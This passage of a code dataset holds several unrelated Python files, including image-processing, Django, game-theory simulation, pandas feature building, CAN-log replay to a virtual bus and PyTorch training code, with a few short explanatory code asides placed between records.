int(abs(self.morphing) / 100 * H)\n k_size = k_size if (k_size % 2 == 1) else k_size + 1\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (k_size, k_size))\n # Execute morphological operations\n # Dilation -> increase masked region\n # Erosion -> decrease masked region\n operation = cv2.MORPH_ERODE if self.morphing < 0 else cv2.MORPH_DILATE\n mask = cv2.morphologyEx(mask, op=operation, kernel=kernel)\n demasked_image = mask[:, :, None] * masked_image + (1 - mask[:, :, None]) * cropped_image\n demasked_image = demasked_image.astype(np.uint8)\n return demasked_image\n\n\nclass FaceDecropperCoarse(object):\n 
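FaceSharpener and FaceBlurer above implement unsharp masking and smoothing on the L channel via GaussianBlur plus addWeighted; the same unsharp-mask idea in its common standalone form, on a synthetic image so the snippet runs without assets:

import numpy as np
import cv2

img = np.zeros((64, 64), dtype=np.uint8)   # soft-edged gray square as test input
img[16:48, 16:48] = 180
img = cv2.GaussianBlur(img, (0, 0), 2)

blur = cv2.GaussianBlur(img, (0, 0), 3)           # low-pass copy
sharp = cv2.addWeighted(img, 1.5, blur, -0.5, 0)  # boost original, subtract blur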
\"\"\"\n Invert the coarse cropping of the image\n \"\"\"\n\n def __call__(self, cropped_image, original_image, bounding_box, offsets):\n \"\"\"\n :param cropped_image: The cropped constructed image\n :param original_image: The original image\n :param bounding_box: Indicator where the cropped region was in the image\n :param offsets: named tuple with the offsets (padding + image out of range) of the\n crop for every bounding box side\n :return: The reconstructed image in the original scene\n \"\"\"\n decropped_image = original_image.copy()\n decropped_image[bounding_box.top:bounding_box.bottom, bounding_box.left:bounding_box.right] = \\\n cropped_image[offsets.top:offsets.bottom, offsets.left:offsets.right]\n return decropped_image\n","sub_path":"implementation/Preprocessor/FaceReconstructor.py","file_name":"FaceReconstructor.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"138294971","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModels for the project module.\n\"\"\"\n\n\nfrom django.db import models\n\n\nclass Project(models.Model):\n \"\"\"\n Represenatatino of a project. Has an\n identifier (like that one in redmine),\n a name etc.\n \n Can be configured to be displayed on the dashboard (or not).\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n identifier = models.CharField(max_length=100, unique=True)\n name = models.CharField(max_length=255)\n description = models.TextField(null=True, blank=True)\n created_on = models.DateTimeField()\n updated_on = models.DateTimeField()\n dashboard_show = models.BooleanField(default=True)\n dashboard_color = models.CharField(max_length=7, default='#96BF0D', help_text='HTML Color Hex Code (e.g. #ff0000)')\n \n def __unicode__(self):\n return self.identifier\n\n\nclass Employee(models.Model):\n \"\"\"\n An employee belongs to many projects. The rest should be self explanatory. :)\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n login = models.CharField(max_length=255, unique=True)\n firstname = models.CharField(max_length=255)\n lastname = models.CharField(max_length=255)\n mail = models.CharField(max_length=255)\n created_on = models.DateTimeField()\n last_login_on = models.DateTimeField(null=True, blank=True)\n project = models.ManyToManyField(Project)\n \n def __unicode__(self):\n return self.login\n\n\nclass IssueTracker(models.Model):\n \"\"\"\n Bug, Feature or Support? Taken from Redmine, but should be relatively\n generic to use with other ticket systems.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n\n\nclass IssueStatus(models.Model):\n \"\"\"\n The status of an issue. For example: New, In Progress, et cetera.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n \n def __unicode__(self):\n return self.name\n \n class Meta:\n verbose_name_plural = 'Issue status'\n\n\nclass IssuePriority(models.Model):\n \"\"\"\n The priority of an issue.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n \n class Meta:\n verbose_name_plural = 'Issue priorities'\n\n\nclass Issue(models.Model):\n \"\"\"\n An issue. Belongs to a project. 
All issues will be wiped and re-imported\n    from/to database upon import.\n    \"\"\"\n    id = models.PositiveIntegerField(primary_key=True, editable=False)\n    subject = models.CharField(max_length=255)\n    description = models.TextField(null=True, blank=True)\n    done_ratio = models.PositiveSmallIntegerField()\n    created_on = models.DateTimeField()\n    updated_on = models.DateTimeField()\n    start_date = models.DateField(null=True, blank=True)\n    due_date = models.DateField(null=True, blank=True)\n    estimated_hours = models.FloatField(null=True, blank=True)\n    author = models.ForeignKey(Employee, related_name='author')\n    project = models.ForeignKey(Project)\n    status = models.ForeignKey(IssueStatus)\n    assigned_to = models.ForeignKey(Employee, null=True)\n    tracker = models.ForeignKey(IssueTracker)\n    priority = models.ForeignKey(IssuePriority)\n    imported_at = models.DateTimeField()\n    \n    def admin_status(self):\n        return self.status.name\n    admin_status.allow_tags = False\n    admin_status.short_description = 'Status'\n\n","sub_path":"Quellcode/mp2board/modules/project/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"391242297","text":"\"\"\"\r\nWeak Prisoner's dilemma with Von Neumann neighbours\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n\r\ndef make_lattice(n):\r\n    lattice = []\r\n    strategy = []\r\n    for i in range(n):\r\n        line_L = []\r\n        line_R = []\r\n        for j in range(n):\r\n            line_L.append(0)\r\n            # 0 for C and 1 for D\r\n            line_R.append(random.choice([0,1]))\r\n        lattice.append(line_L)\r\n        strategy.append(line_R)\r\n    lattice = np.array(lattice)\r\n    strategy = np.array(strategy)\r\n    return lattice,strategy\r\n\r\n\r\ndef show_plot(strategy):\r\n    plt.imshow(strategy,interpolation='nearest')\r\n    plt.axis('off')\r\n    plt.show()\r\n\r\n\r\ndef get_neighbours_von_neuman(row,col,size):\r\n    x = row\r\n    y = col\r\n    up = x - 1\r\n    right = (y + 1) % size\r\n    down = (x + 1) % size\r\n    left = y - 1\r\n\r\n    u = (up, y)\r\n    r = (x, right)\r\n    d = (down, y)\r\n    l = (x, left)\r\n\r\n    return [u,r,d,l]\r\n\r\n\r\ndef score(pos, strategy, neighbours, payoff):\r\n    \"\"\"\r\n    Score for each player, sum of all the payoff of all the neighbours\r\n    :param pos: position of player\r\n    :param strategy: arrays of strategy of the players\r\n    :param neighbours: list of tuples of positions for neighbours\r\n    :param payoff: matrix of payoff\r\n    :return: score\r\n    \"\"\"\r\n    R = payoff[0]\r\n    S = payoff[1]\r\n    T = payoff[2]\r\n    P = payoff[3]\r\n    x,y = pos\r\n    score = 0\r\n\r\n    if strategy[x][y] == 0:\r\n        for neighbour in neighbours:\r\n            a,b = neighbour\r\n            if strategy[a][b] == 0:\r\n                score += R\r\n            else:\r\n                score += S\r\n    else:\r\n        for neighbour in neighbours:\r\n            a,b = neighbour\r\n            if strategy[a][b] == 0:\r\n                score += T\r\n            else:\r\n                score += P\r\n\r\n    return score\r\n\r\n\r\ndef update_scores_von_neuman(lattice,strategy,payoff,size):\r\n    \"\"\"\r\n    Update the lattice with von neumann neighbours\r\n    \"\"\"\r\n    for i in range(size):\r\n        for j in range(size):\r\n            neighbours = get_neighbours_von_neuman(i,j,size)\r\n            lattice[i][j] = score((i,j),strategy,neighbours,payoff)\r\n\r\n\r\ndef update_strat_von_neuman(lattice,strategy,size):\r\n    new_strategy = np.zeros((size,size))\r\n    for i in range(size):\r\n        for j in range(size):\r\n            neighbours = get_neighbours_von_neuman(i,j,size)\r\n            best_score = lattice[i][j]\r\n            best_strat = strategy[i][j]\r\n            for neighbour in 
neighbours:\r\n x,y = neighbour\r\n if best_score < lattice[x][y]:\r\n best_score = lattice[x][y]\r\n best_strat = strategy[x][y]\r\n new_strategy[i][j] = best_strat\r\n return new_strategy\r\n\r\n\r\ndef plot_coop(cooperation_level,size):\r\n fig = plt.figure()\r\n fig.suptitle(\"Cooperation level Stag-Hunt game with Von Neumann neighbours\\nLattice of \"\r\n \"size %sx%s & Unconditional\" % (size,size),\r\n fontsize=14,\r\n fontweight='bold')\r\n\r\n ax = fig.add_subplot(111)\r\n\r\n ax.set_xlabel('Turns')\r\n ax.set_ylabel('Cooperation level averaged over 100 runs')\r\n x = np.arange(101)\r\n cooperation_level = np.array(cooperation_level)\r\n y = np.mean(cooperation_level,axis=0)\r\n ax.plot(x,y)\r\n ax.set_ylim([0,1])\r\n\r\n plt.show()\r\n\r\n\r\ndef final_distribution(final_coop,size):\r\n fig = plt.figure()\r\n fig.suptitle(\"Distribution of final cooperation levels of\\n Stag-Hunt game with Von \"\r\n \"Neumann Neighbours\\nLattice of size %sx%s & Unconditional\" %(size,size),\r\n fontsize=14,\r\n fontweight='bold')\r\n\r\n ax = fig.add_subplot(111)\r\n\r\n ax.set_xlabel('Cooperation levels')\r\n ax.set_ylabel('Number of runs')\r\n\r\n x = np.array(final_coop)\r\n\r\n ax.hist(x,5)\r\n ax.set_ylim([0,100])\r\n ax.set_xlim([0,1])\r\n\r\n plt.show()\r\n\r\n\r\ndef main(size,payoff):\r\n #initiate lattices\r\n lattice,strategy = make_lattice(size)\r\n show_plot(strategy)\r\n\r\n cooperation_level = [((size*size) - np.sum(strategy))/(size*size)]\r\n\r\n #100 turns\r\n for i in range(100):\r\n update_scores_von_neuman(lattice,strategy,payoff,size)\r\n strategy = update_strat_von_neuman(lattice,strategy,size)\r\n cooperation_level.append(((size*size) - np.sum(strategy))/(size*size))\r\n\r\n if i == 1 or i == 5 or i == 10 or i == 20 or i == 50 or i == 100:\r\n show_plot(strategy)\r\n\r\n return cooperation_level\r\n\r\n\r\nif __name__ == \"__main__\":\r\n size = int(input(\"Size of the Lattice:\"))\r\n #size = str(input(\"Size of the lattice: \"))\r\n payoff = str(input(\"Reward, Sucker's payoff, Temptation to Defect, Punition : \"))\r\n payoff = payoff.strip().split(',')\r\n\r\n for i in range(4):\r\n payoff[i] = int(payoff[i])\r\n \"\"\"size = size.strip().split(',')\r\n for i in range(len(size)):\r\n size[i] = int(size[i])\r\n\r\n for lattice in size:\r\n cooperation_level = []\r\n final_cooperation_level = []\r\n for i in range(100):\r\n current = main(lattice, payoff)\r\n cooperation_level.append(current)\r\n final_cooperation_level.append(current[-1])\r\n print(i)\r\n plot_coop(cooperation_level, lattice)\r\n final_distribution(final_cooperation_level, lattice)\"\"\"\r\n main(size, payoff)","sub_path":"Learning_Dynamics/CharlotteNachtegael/Assignments/PD_Von_neumann.py","file_name":"PD_Von_neumann.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649955330","text":"import os, pdb, torch\nimport pandas as pd\nimport numpy as np\n\nfrom Configs import _C as cfg\nfrom .click import make_click_with_ad\n\n\ndef make_user_behavior_seq_test(cols = ['creative_id', 'ad_id', 'advertiser_id',]):\n\n save_dir = cfg.features + \"user_behavior_df_test.pkl\"\n if os.path.exists(save_dir):\n print(\"已存在 `{}`, 直接读取返回...\".format(save_dir))\n user_behavior_df_test=pd.read_pickle(save_dir)\n return user_behavior_df_test\n\n print(\"\\n无本地 user_behavior_df_test, 重新生成 `{}`\".format(save_dir))\n click_all = make_click_with_ad()\n click_all.replace('\\\\N', 'nan', inplace=True)\n\n for col in cols:\n 
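The lattice game above scores von Neumann neighbours cell by cell in Python loops; the same wraparound neighbour counts can be computed in four vectorized shifts, which may be worth knowing for larger lattices (0=C/1=D coding as in the record):

import numpy as np

strategy = np.random.default_rng(0).integers(0, 2, size=(8, 8))

# Torus topology: roll the lattice one step in each direction and sum,
# giving every cell its number of defecting von Neumann neighbours.
defectors = (np.roll(strategy, 1, axis=0) + np.roll(strategy, -1, axis=0) +
             np.roll(strategy, 1, axis=1) + np.roll(strategy, -1, axis=1))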
decode_list = torch.load(cfg.decode + f\"all_{col}_decode_string.pth\").split(',')\n decode_dict = {v: str(i) for i, v in enumerate(decode_list)}\n\n click_all[col] = click_all[col].astype('str').map(decode_dict)\n print(\"all_{}_decode_list: {}\".format(col, decode_list[:20]))\n print(\"click_all[`{}`]: {}\".format(col, click_all[col][:60]))\n\n click_test = click_all.query(\"type=='test'\").sort_values([\"time\"]).reset_index(drop=True)\n\n click_test['user_id'] = click_test['user_id'].astype('int64')\n\n user_group = click_test.groupby(['user_id'])\n user_behavior_df_test = pd.DataFrame()\n for col in cols:\n df = user_group.agg({col: list})\n user_behavior_df_test[col + \"_200\"] = df[col].map(lambda sentence: ','.join(sentence))\n\n user_behavior_df_test['seq_length'] = user_group[cols[0]].agg('count').values\n\n user_behavior_df_test.reset_index().to_pickle(save_dir)\n\n return user_behavior_df_test\n\n\ndef make_user_behavior_seq(cols = ['creative_id', 'ad_id', 'advertiser_id',]):\n\n save_dir = cfg.features + \"user_behavior_df.pkl\"\n if os.path.exists(save_dir):\n print(\"已存在 `{}`, 直接读取返回...\".format(save_dir))\n user_behavior_df=pd.read_pickle(save_dir)\n return user_behavior_df\n\n print(\"\\n无本地 user_behavior_df, 重新生成 `{}`\".format(save_dir))\n click_all = make_click_with_ad()\n click_all.replace('\\\\N', 'nan', inplace=True)\n\n for col in cols:\n decode_list = torch.load(cfg.decode + f\"all_{col}_decode_string.pth\").split(',')\n decode_dict = {v: str(i) for i, v in enumerate(decode_list)}\n\n click_all[col] = click_all[col].astype('str').map(decode_dict)\n print(\"all_{}_decode_list: {}\".format(col, decode_list[:20]))\n print(\"click_all[{}]: {}\".format(col, click_all[col][:60]))\n if click_all[col].isna().any():\n pdb.set_trace()\n\n click_train = click_all.query(\"type=='train'\").sort_values([\"time\"]).reset_index(drop=True)\n click_test = click_all.query(\"type=='test'\").sort_values([\"time\"]).reset_index(drop=True)\n\n click_train['user_id'] = click_train['user_id'].astype('int64')\n\n user_group = click_train.groupby(['user_id'])\n user_behavior_df = pd.DataFrame()\n for col in cols:\n df = user_group.agg({col: list})\n user_behavior_df[col + \"_200\"] = df[col].map(lambda sentence: ','.join(sentence))\n\n user_behavior_df['seq_length'] = user_group[cols[1]].agg('count').values\n\n user = pd.read_csv(cfg.train_dir+'/user.csv')\n user['user_id'] = user['user_id'].astype('int64')\n user_behavior_df = user_behavior_df.reset_index().merge(user, how=\"left\", on=\"user_id\")\n user_behavior_df.to_pickle(save_dir)\n\n return user_behavior_df\n\n\ndef clip_fn(sentence):\n length = len(sentence)\n if length >= 200:\n sentence = sentence[-200:]\n else:\n sentence += [0] * (200 - length)\n return ','.join(sentence)\n\n\ndef seq2lengths(seq):\n length = (np.array(seq) != 0).sum()\n return length\n\n\ndef seq2string_with_length(seq):\n length = len(seq)\n seq_string = \",\".join(str(w) for w in seq)\n return f\"{seq_string}_{length}\"\n\n\n\n\"\"\" \ncreative_id, 3412772 | 931637\nad_id, 3027360 | 763170\nuser_id, 1900000\nclick_times, 94 | 53\nproduct_id, 39057 | 5784\nproduct_category, 18 | None\nadvertiser_id, 57870\nindustry, 332 | {8, 89, 93, 151, 195, 196}\ncategory 1-18, 无需编码\n\"\"\"\n","sub_path":"src/processing/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218617247","text":"import string\nst = input(\"Please enter the string: 
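The heart of make_user_behavior_seq above is a groupby that collapses each user's clicks into one comma-joined string plus a length column; a toy reproduction of just that step (toy frame, not the competition data):

import pandas as pd

clicks = pd.DataFrame({'user_id': [1, 1, 2, 2, 2],
                       'creative_id': ['a', 'b', 'c', 'a', 'd']})

seqs = clicks.groupby('user_id').agg({'creative_id': list})  # ids in click order
seqs['creative_id_200'] = seqs['creative_id'].map(','.join)  # flatten to string
seqs['seq_length'] = seqs['creative_id'].map(len)            # per-user count
print(seqs[['creative_id_200', 'seq_length']])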
\")\nx = list(string.ascii_letters)\ny = list(string.digits)\nlet, dig = 0, 0\nfor i in st:\n if i in x:\n let+=1\n elif i in y:\n dig+=1\n\nprint(let,dig)\n \n\n","sub_path":"programsstring.py","file_name":"programsstring.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34560910","text":"from functools import partial\nfrom itertools import islice\nimport datetime\nimport bitstring\nimport struct\nimport time\nfrom time import sleep\n\nimport socket\n\nfrom can import Message\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef decode(msg: bytes):\n '''\n\n :param msg 16 bytes:\n :return: service_info, timeoffest, messaege_id, data =\n '''\n\n service, msg = msg[:2], msg[2:]\n time_of_record_in_miliseconds, msg = int.from_bytes(msg[:2], byteorder=\"little\", signed=False), msg[2:]\n message_id, message = msg[:4], msg[4:]\n bs = bitstring.BitArray(service)\n bs.reverse()\n time_of_record_in_miutes = bs[:10]\n minutes = int(time_of_record_in_miutes.bin, 2)\n\n return bs.bin, int(bs[10]), bs[14], bs[15], int(bs[11:14].bin, 2), str(\n datetime.timedelta(minutes=minutes, milliseconds=time_of_record_in_miliseconds))[:-3], bitstring.BitArray(\n message_id).bin, message.hex()\n\n\ndef decode2(msg: bytes):\n\n\n\n service, msg = msg[:2], msg[2:]\n time_of_record_in_miliseconds, msg = int.from_bytes(msg[:2], byteorder=\"little\", signed=False), msg[2:]\n message_id, message = msg[:4], msg[4:]\n\n\n\n ms = bitstring.BitArray(message_id[::-1])\n ms_reversed = bitstring.BitArray(message_id)\n\n\n service = bitstring.BitArray(service[::-1])[::-1]\n\n is_service = service[14]\n is_29 = service[15]\n data_len = int(service[11:14].bin,2)+1\n time_in_minutes = int(service[0:10].bin, 2)\n\n\n return is_service, time_in_minutes, time_of_record_in_miliseconds, ms.hex, str(message.hex())[:data_len*2]\n\nimport can\n\nbustype = 'socketcan'\nchannel = 'vcan0'\nbus = can.interface.Bus(channel=channel, bustype=bustype)\n\ndef send_data():\n with open(\"output.CAN\", \"rb\") as canfile:\n messages = iter(partial(canfile.read, 16), b'')\n ids = set()\n # print(header.hex(), decode2(header))\n time = 1\n prev_time_in_ms = 0\n\n\n for chunk in islice(messages, 99999999999999999):\n is_service, time_in_minutes, time_in_milliseconds, message_id, message = decode2(chunk)\n dt = time_in_milliseconds - prev_time_in_ms\n # time.sleep(new_time - dt)\n if(dt)<0: dt =1\n time+= dt\n\n delta = datetime.timedelta(milliseconds = time)\n\n\n prev_time_in_ms = time_in_milliseconds\n\n \n date =str(delta)[:-3]\n\n if len(date)< 8:\n continue\n\n\n result = \"%s %s %s %s\\r\\n\" %( date, \"N\" if is_service else \"R\", message_id, \" \".join(chunks(message,2)))\n msg = Message(arbitration_id=int(message_id,16), data=list(map(lambda x: int(x, 16), chunks(message,2))), extended_id=True)\n bus.send(msg)\n print(msg)\n sleep(dt/1000)\n \n\n\n\nif __name__ == \"__main__\":\n send_data()\n\n\n","sub_path":"can2vcan.py","file_name":"can2vcan.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53106801","text":"from django.shortcuts import render, get_object_or_404\nfrom django.db.models import Count\n\nfrom .models import Blog, BlogType, Tag\n\ndef index(request):\n '''首页'''\n blogs = Blog.objects.all()[:10]\n hot_blogs = 
Blog.objects.all().order_by('-read_nums')[:5]\n blog_types = BlogType.objects.all()\n tags = Tag.objects.all()\n\n context = {}\n context['blogs'] = blogs\n context['hot_blogs'] = hot_blogs\n context['blog_types'] = blog_types\n context['tags'] = tags\n return render(request, 'blog/index.html', context)\n\ndef blog_list(request):\n '''博客列表'''\n blogs = Blog.objects.all()\n\n # annotate聚合, 逐个计算queryset中每个对象的blog数量, 并给每个对象添加blog_count属性\n blog_types = BlogType.objects.all().annotate(blog_nums=Count('blog'))\n\n tags = Tag.objects.all()\n\n # 获取所有博客的月份的datetime.date对象集合\n blog_dates = Blog.objects.dates('publish_time', 'month', order='DESC')\n # 统计对应月份blog数量\n blog_dates_dict = {}\n for blog_date in blog_dates:\n blog_nums = Blog.objects.filter(publish_time__year=blog_date.year, \\\n publish_time__month=blog_date.month).count()\n blog_dates_dict[blog_date] = blog_nums\n\n context = {}\n context['blogs'] = blogs\n context['blog_types'] = blog_types\n context['tags'] = tags\n context['blog_dates'] = blog_dates_dict\n return render(request, 'blog/blog_list.html', context)\n\ndef blog_detail(request, blog_id):\n '''博客详情'''\n blog = get_object_or_404(Blog, pk=blog_id)\n blog.read_nums = blog.read_nums + 1\n blog.save()\n # 上一篇博客\n previous_blog = Blog.objects.filter(publish_time__gt=blog.publish_time).order_by('publish_time').first()\n # 下一篇博客\n next_blog = Blog.objects.filter(publish_time__lt=blog.publish_time).order_by('-publish_time').first()\n\n context = {}\n context['blog'] = blog\n context['previous_blog'] = previous_blog\n context['next_blog'] = next_blog\n return render(request, 'blog/blog_detail.html', context)\n\n\ndef blog_type(request, blog_type_id):\n pass\n\n\ndef blog_date(request, year, month):\n pass","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342956346","text":"from torchvision import datasets, models, transforms\nimport torch.utils.data as data\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torch.nn as nn\nimport torch, os\n# for reproducing\ntorch.manual_seed(66)\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.deterministic = True\n\nimport time, copy\nimport multiprocessing\nfrom torchsummary import summary\nimport pretrainedmodels # for inception-v4 and xception\nfrom efficientnet_pytorch import EfficientNet\nimport csv\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train CottonWeed Classifier')\n # Load a pretrained model - resnet18, resnet50, resnet101, alexnet, squeezenet, vgg11, vgg16, vgg19,\n # densenet121, densenet169, densenet161, inception, inceptionv4, googlenet, xception, mobilenet_v2,\n # mobilenet_v3_small, mobilenet_v3_large, inceptionresnetv2, dpn68, mnasnet1_0, efficientnet-b0\n # efficientnet-b1, efficientnet-b2, efficientnet-b3, efficientnet-b4, efficientnet-b5\n parser.add_argument('--model_name', type=str, required=False, default='alexnet',\n help=\"choose a deep learning model\")\n parser.add_argument('--train_mode', type=str, required=False, default='finetune',\n help=\"Set training mode: finetune, transfer, scratch\")\n parser.add_argument('--num_classes', type=int, required=False, default=15, help=\"Number of Classes\")\n parser.add_argument('--epochs', type=int, required=False, default=50, help=\"Training Epochs\")\n parser.add_argument('--batch_size', type=int, 
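blog_list in the Django record above issues one filtered count query per archive month; the same numbers can come back in a single query, sketched here against the record's Blog model (untested against that schema; TruncMonth requires Django >= 1.10):

from django.db.models import Count
from django.db.models.functions import TruncMonth

month_counts = (Blog.objects
                .annotate(month=TruncMonth('publish_time'))  # bucket by month
                .values('month')
                .annotate(blog_nums=Count('id'))             # posts per bucket
                .order_by('-month'))
# e.g. [{'month': date(2020, 5, 1), 'blog_nums': 7}, ...]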
required=False, default=12, help=\"Training batch size\")\n parser.add_argument('--img_size', type=int, required=False, default=512, help=\"Image Size\")\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\nnum_classes = args.num_classes\nmodel_name = args.model_name\ntrain_mode = args.train_mode\nnum_epochs = args.epochs\nbs = args.batch_size\nimg_size = args.img_size\n# Set the train and validation directory paths\ntrain_directory = '/home/dong9/Downloads/DATA_0820/CottonWeedDataset/train'\nvalid_directory = '/home/dong9/Downloads/DATA_0820/CottonWeedDataset/val'\n\nif not os.path.isfile('train_performance.csv'):\n with open('train_performance.csv', mode='w') as csv_file:\n fieldnames = ['Model', 'Training Time', 'Trainable Parameters', 'Best Train Acc', 'Best Train Epoch',\n 'Best Val Acc', 'Best Val Epoch']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n\n# Set the model save path\nPATH = model_name + \".pth\"\n# Number of workers\nnum_cpu = multiprocessing.cpu_count()\n\n# Applying transforms to the data\nimage_transforms = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(size=img_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(size=img_size),\n transforms.CenterCrop(size=img_size),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ])\n}\n\n# Load data from folders\ndataset = {\n 'train': datasets.ImageFolder(root=train_directory, transform=image_transforms['train']),\n 'valid': datasets.ImageFolder(root=valid_directory, transform=image_transforms['valid'])\n}\n\n# Size of train and validation data\ndataset_sizes = {\n 'train': len(dataset['train']),\n 'valid': len(dataset['valid'])\n}\n\n# Create iterators for data loading\ndataloaders = {\n 'train': data.DataLoader(dataset['train'], batch_size=bs, shuffle=True,\n num_workers=num_cpu, pin_memory=True, drop_last=True),\n 'valid': data.DataLoader(dataset['valid'], batch_size=bs, shuffle=True,\n num_workers=num_cpu, pin_memory=True, drop_last=True)}\n\n# Class names or target labels\nclass_names = dataset['train'].classes\nprint(\"Classes:\", class_names)\n\n# Print the train and validation data sizes\nprint(\"Training-set size:\", dataset_sizes['train'],\n \"\\nValidation-set size:\", dataset_sizes['valid'])\n\nprint(\"\\nLoading pretrained-model for finetuning ...\\n\")\nmodel_ft = None\n\nif model_name == 'resnet18':\n # Modify fc layers to match num_classes\n model_ft = models.resnet18(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'resnet50':\n # Modify fc layers to match num_classes\n model_ft = models.resnet50(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'resnet101':\n # Modify fc layers to match num_classes\n model_ft = models.resnet101(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'alexnet':\n model_ft = models.alexnet(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'vgg11':\n model_ft = models.vgg11(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'vgg16':\n model_ft = models.vgg16(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, 
num_classes)\nelif model_name == 'vgg19':\n model_ft = models.vgg19(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'squeezenet':\n model_ft = models.squeezenet1_0(pretrained=True)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\nelif model_name == 'densenet121':\n model_ft = models.densenet121(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'densenet169':\n model_ft = models.densenet169(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'densenet161':\n model_ft = models.densenet161(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inception':\n model_ft = models.inception_v3(pretrained=True)\n model_ft.aux_logits = False\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inceptionv4':\n model_ft = pretrainedmodels.inceptionv4(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'googlenet':\n model_ft = models.googlenet(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'xception':\n model_ft = pretrainedmodels.xception(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'mobilenet_v2':\n model_ft = models.mobilenet_v2(pretrained=True)\n model_ft.classifier[1] = nn.Linear(model_ft.last_channel, num_classes)\nelif model_name == 'mobilenet_v3_small':\n model_ft = models.mobilenet_v3_small(pretrained=True)\n model_ft.classifier[3] = nn.Linear(model_ft.classifier[3].in_features, num_classes)\nelif model_name == 'mobilenet_v3_large':\n model_ft = models.mobilenet_v3_large(pretrained=True)\n model_ft.classifier[3] = nn.Linear(model_ft.classifier[3].in_features, num_classes)\nelif model_name == 'shufflenet_v2_x0_5':\n model_ft = models.shufflenet_v2_x0_5(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'shufflenet_v2_x1_0':\n model_ft = models.shufflenet_v2_x1_0(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inceptionresnetv2':\n model_ft = pretrainedmodels.inceptionresnetv2(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'nasnetamobile':\n model_ft = pretrainedmodels.nasnetamobile(num_classes=1000, pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'dpn68':\n model_ft = pretrainedmodels.dpn68(pretrained='imagenet')\n model_ft.last_linear = nn.Conv2d(832, num_classes, kernel_size=(1, 1), stride=(1, 1))\nelif model_name == 